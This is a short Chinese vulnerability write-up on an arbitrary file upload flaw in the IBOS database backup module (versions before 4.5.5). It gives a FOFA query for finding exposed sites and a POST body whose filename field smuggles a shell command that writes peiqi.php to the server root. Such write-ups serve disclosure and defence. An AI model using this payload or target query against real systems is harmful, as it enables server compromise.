IBOS_数据库模块_任意文件上传漏洞-棉花糖会员站

IBOS_数据库模块_任意文件上传漏洞

7月15日发布

030

# IBOS 数据库模块任意文件上传漏洞

## 漏洞描述

IBOS 后台数据库模块存在任意文件上传漏洞，攻击者进入后台后可以上传恶意文件控制服务器

## 漏洞影响

> [!NOTE]
>
> IBOS < 4.5.5 ## FOFA > [!NOTE]
>
> body=”IBOS” && body=”login-panel”

## 漏洞复现

登录页面如下

“`
http://xxx.xxx.xxx.xxx/?r=dashboard/default/login
“`

![](/static/qingy/IBOS_数据库模块_任意文件上传漏洞/img/1.png)

找到数据库备份模块

![](/static/qingy/IBOS_数据库模块_任意文件上传漏洞/img/2.png)

提交并抓包

![](/static/qingy/IBOS_数据库模块_任意文件上传漏洞/img/3.png)

修改filename参数发送包会上传peiqi.php文件到根目录

“`
backuptype=all&custom_enabled=1&method=shell&sizelimit=2048&extendins=0&sqlcompat=MYSQL41&sqlcharset=utf8&usehex=0&usezip=0&filename=peiqi%26echo ““>peiqi%PATHEXT:~0,1%php%26peiqi&dbSubmit=1
“`

![](/static/qingy/IBOS_数据库模块_任意文件上传漏洞/img/4.png)

© 版权声明

文章版权归作者所有，未经允许请勿转载。

THE END

国内漏洞库

喜欢就支持一下吧

相关推荐

评论抢沙发

请登录后发表评论

请登录后查看评论内容